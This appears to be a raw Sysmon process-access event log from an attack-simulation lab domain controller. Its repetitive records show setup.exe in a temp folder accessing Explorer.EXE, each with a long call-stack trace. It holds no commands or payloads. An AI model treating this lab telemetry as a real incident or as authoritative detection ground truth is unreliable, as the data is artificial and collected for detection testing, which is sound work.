C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000016089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 